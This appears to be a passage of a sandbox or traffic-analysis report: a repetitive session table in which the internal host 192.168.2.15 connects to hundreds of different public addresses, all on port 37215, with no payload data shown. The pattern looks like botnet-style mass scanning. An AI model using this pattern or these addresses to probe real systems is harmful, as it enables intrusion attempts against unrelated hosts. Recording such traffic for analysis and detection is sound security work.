                                              3982192.168.2.1559232102.48.62.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3983192.168.2.1555982181.186.84.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3984192.168.2.1542202138.208.206.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3985192.168.2.153523467.107.84.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3986192.168.2.1536248197.6.35.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3987192.168.2.1554948186.53.187.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3988192.168.2.154464037.136.38.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3989192.168.2.1559234197.233.213.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3990192.168.2.1533176190.56.161.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3991192.168.2.1560384102.40.143.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3992192.168.2.1559844121.153.34.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3993192.168.2.155802231.7.118.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3994192.168.2.1548456190.170.163.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3995192.168.2.1542842190.164.84.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3996192.168.2.153545637.227.8.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3997192.168.2.1543696138.136.224.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3998192.168.2.1549922156.105.11.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3999192.168.2.1533560122.109.193.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4000192.168.2.1547752157.82.196.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4001192.168.2.155510441.50.179.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4002192.168.2.1534250197.245.241.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4003192.168.2.155794631.180.139.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4004192.168.2.1549150197.254.156.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4005192.168.2.155270231.245.114.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4006192.168.2.1559590102.78.120.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4007192.168.2.1533250222.151.29.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4008192.168.2.154792431.204.239.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4009192.168.2.1544492156.220.45.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4010192.168.2.1545392186.83.241.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4011192.168.2.1556002138.71.226.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4012192.168.2.1536866197.18.15.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4013192.168.2.154680845.77.129.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4014192.168.2.1554138181.63.118.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4015192.168.2.1550612181.88.164.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4016192.168.2.1550830121.192.243.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4017192.168.2.1549782190.116.128.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4018192.168.2.153615037.82.175.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4019192.168.2.1558312121.92.7.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4020192.168.2.1534802122.178.101.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4021192.168.2.1551576122.114.33.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4022192.168.2.1536318181.221.130.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4023192.168.2.154514241.45.180.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4024192.168.2.1540498197.23.73.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4025192.168.2.1538310156.217.52.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4026192.168.2.1536114157.94.175.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4027192.168.2.1552178222.94.77.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4028192.168.2.155218441.169.69.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4029192.168.2.155688431.67.7.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4030192.168.2.1536330157.206.106.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4031192.168.2.1534042156.253.220.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4032192.168.2.1534870138.58.55.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4033192.168.2.1555462156.14.147.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4034192.168.2.1557792197.48.73.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4035192.168.2.1557782186.142.100.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4036192.168.2.1532812181.199.252.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4037192.168.2.1558068197.166.131.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4038192.168.2.1535680121.36.38.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4039192.168.2.155469845.188.47.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4040192.168.2.153304631.11.107.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4041192.168.2.1558376222.153.85.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4042192.168.2.155320694.140.22.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4043192.168.2.155540431.112.7.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4044192.168.2.1559182122.230.175.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4045192.168.2.1550728121.105.178.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4046192.168.2.1558858181.9.22.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4047192.168.2.1540012157.246.195.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4048192.168.2.154805645.44.150.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4049192.168.2.1553278122.36.131.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4050192.168.2.155404045.94.125.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4051192.168.2.1559690138.170.44.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4052192.168.2.1554836222.239.218.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4053192.168.2.1542352181.252.84.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4054192.168.2.1548644157.209.5.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4055192.168.2.1546212156.216.238.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4056192.168.2.1558458197.15.250.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4057192.168.2.155823631.77.237.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4058192.168.2.1542792156.205.8.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4059192.168.2.1545062181.253.232.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4060192.168.2.153502094.25.118.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4061192.168.2.1533024157.186.220.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4062192.168.2.155551631.96.120.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4063192.168.2.154429245.22.38.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4064192.168.2.1543152186.139.1.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4065192.168.2.154563045.112.124.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4066192.168.2.154830045.142.166.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4067192.168.2.153731431.83.177.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4068192.168.2.1550086186.165.23.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4069192.168.2.1551114157.252.192.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4070192.168.2.153946239.144.168.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4071192.168.2.1532916102.202.251.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4072192.168.2.1552314181.118.88.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4073192.168.2.1546640222.27.255.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4074192.168.2.154102837.132.159.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4075192.168.2.1551908156.35.218.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4076192.168.2.155527441.255.58.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4077192.168.2.1548870102.206.17.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4078192.168.2.153366031.253.117.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4079192.168.2.155017045.92.228.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4080192.168.2.1548794222.95.230.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4081192.168.2.154174031.123.2.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4082192.168.2.1558116121.48.70.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4083192.168.2.1548754121.119.49.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4084192.168.2.154995641.161.248.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4085192.168.2.1544732222.20.16.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4086192.168.2.153314845.185.182.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4087192.168.2.156051241.127.122.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4088192.168.2.1552726181.102.205.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4089192.168.2.155711294.181.21.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4090192.168.2.154193845.19.134.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4091192.168.2.1559336121.20.207.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4092192.168.2.1548046197.151.230.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4093192.168.2.154511294.209.38.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4094192.168.2.1544334122.172.87.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4095192.168.2.1535358190.204.194.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4096192.168.2.1555322190.5.79.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4097192.168.2.1545584156.122.216.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4098192.168.2.1539106156.147.43.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4099192.168.2.1535186157.32.222.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4100192.168.2.1545372156.60.84.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4101192.168.2.1542056157.232.191.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4102192.168.2.154822645.41.230.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4103192.168.2.1556310156.253.80.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4104192.168.2.155757237.55.255.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4105192.168.2.154136841.78.211.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4106192.168.2.1539026197.211.111.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4107192.168.2.1543204222.160.179.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4108192.168.2.1556172222.40.248.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4109192.168.2.153626431.4.27.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4110192.168.2.1549148156.122.148.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4111192.168.2.1546252138.5.205.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4112192.168.2.1557496138.249.236.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4113192.168.2.154807841.87.164.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4114192.168.2.1555956221.249.242.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4115192.168.2.155800037.38.186.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4116192.168.2.153857694.174.45.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4117192.168.2.153589045.95.128.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4118192.168.2.155856241.203.206.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4119192.168.2.1536358138.247.33.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4120192.168.2.1548528223.188.197.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4121192.168.2.1540508122.156.29.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4122192.168.2.1535220121.215.75.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4123192.168.2.154926845.149.124.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4124192.168.2.154811031.68.157.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4125192.168.2.1545736102.146.188.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4126192.168.2.1559096197.5.234.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4127192.168.2.1551908102.163.127.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4128192.168.2.1554218197.253.62.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4129192.168.2.1537480156.85.24.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4130192.168.2.1553496197.174.235.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4131192.168.2.154959437.55.211.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4132192.168.2.1558882222.111.172.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4133192.168.2.153924868.38.119.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4134192.168.2.1553090197.129.197.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4135192.168.2.1542698197.140.197.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4136192.168.2.1560240197.80.173.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4137192.168.2.1556790197.4.125.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4138192.168.2.156033641.174.4.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4139192.168.2.153638273.167.87.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4140192.168.2.1542046190.46.74.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4141192.168.2.1537068121.14.190.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4142192.168.2.1535982197.155.249.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4143192.168.2.1554948186.173.252.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4144192.168.2.155215241.130.142.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4145192.168.2.153743445.249.71.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4146192.168.2.1559904138.43.201.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4147192.168.2.1539798102.178.221.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4148192.168.2.155135245.176.95.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4149192.168.2.1536050156.210.119.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4150192.168.2.1535262186.125.241.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4151192.168.2.154378037.75.24.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4152192.168.2.1542154121.161.174.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4153192.168.2.1533596197.52.54.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4154192.168.2.1538354181.192.17.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4155192.168.2.1558148197.92.154.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4156192.168.2.154031845.216.202.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4157192.168.2.1551284186.213.172.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4158192.168.2.1548320186.116.40.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4159192.168.2.1559970122.144.142.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4160192.168.2.1560386102.26.6.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4161192.168.2.154761697.19.74.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4162192.168.2.1540672138.50.5.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4163192.168.2.155366894.45.245.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4164192.168.2.1550276186.16.111.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4165192.168.2.1533334122.253.171.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4166192.168.2.1546668181.152.30.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4167192.168.2.1536924190.120.24.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4168192.168.2.1539716222.218.68.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4169192.168.2.1557756102.119.36.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4170192.168.2.1535412138.197.103.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4171192.168.2.153391031.163.110.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4172192.168.2.154731431.7.193.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4173192.168.2.153398431.127.81.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4174192.168.2.1540796222.175.70.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4175192.168.2.1539362157.176.28.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4176192.168.2.1552740138.199.203.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4177192.168.2.155553631.161.146.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4178192.168.2.1538638180.30.56.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4179192.168.2.1542060157.19.138.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4180192.168.2.154477041.148.254.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4181192.168.2.1544986190.90.147.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4182192.168.2.154989637.70.179.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4183192.168.2.155412841.140.95.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4184192.168.2.153711274.28.218.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4185192.168.2.1545132138.143.238.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4186192.168.2.1537880102.253.101.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4187192.168.2.1540508186.101.141.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4188192.168.2.1556674197.112.176.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4189192.168.2.154409694.210.122.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4190192.168.2.1555848181.215.149.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4191192.168.2.153722831.182.196.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4192192.168.2.1553390186.248.19.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4193192.168.2.1554858157.110.169.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4194192.168.2.154128431.37.249.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4195192.168.2.155842863.76.133.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4196192.168.2.1541674186.87.206.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4197192.168.2.153521041.157.189.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4198192.168.2.154092041.124.76.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4199192.168.2.1534948186.203.229.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4200192.168.2.1537384156.12.123.4437215
